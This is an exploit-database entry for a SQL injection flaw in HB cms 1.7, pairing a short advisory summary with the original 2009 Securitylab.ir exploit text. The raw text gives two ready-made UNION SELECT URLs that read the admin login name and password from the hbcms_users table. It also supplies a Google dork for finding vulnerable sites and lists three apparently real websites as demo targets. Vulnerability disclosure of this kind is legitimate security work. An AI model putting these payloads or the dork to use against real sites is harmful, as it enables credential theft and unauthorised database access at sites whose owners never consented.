HB cms Sql Injection Vulnerability

vendor:

HB cms

by:

Securitylab.ir

6.5

CVSS

MEDIUM

Sql Injection

CWE

Product Name: HB cms

Affected Version From: 1.7

Affected Version To: 1.7

Patch Exists: Yes

Related CWE: N/A

CPE: a:hbcms:hbcms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

HB cms Sql Injection Vulnerability

HB cms is vulnerable to Sql Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'article_id' parameter of the 'update_article_hits.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL statements to the vulnerable script. This can allow the attacker to gain access to the database and extract sensitive information.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of HB cms.

Source

Exploit-DB raw data:

########################## Securitylab.ir ########################
# Application Info:
# Name: HB cms
# Version: 1.7
# Website: http://www.hbcms.com
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
# Dork: inurl:/hbcms/php/
# magic_quotes_gpc = On  /\  register_globals = Off
#===========================================================
# User:
# http://site.com/[path]/php/update_article_hits.php?show_hits=yes&article_id=-1%e5" union select login_name from hbcms_users where id=1%23
# 
# Pass:
# http://site.com/[path]/php/update_article_hits.php?show_hits=yes&article_id=-1%e5" union select login_pass from hbcms_users where id=1%23
#
# Demo:
# http://www.aolinivt.com/hbcms
# http://www1.bonetumor.cc/hbcms
# http://beauty-f.com/ps/hbcms
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################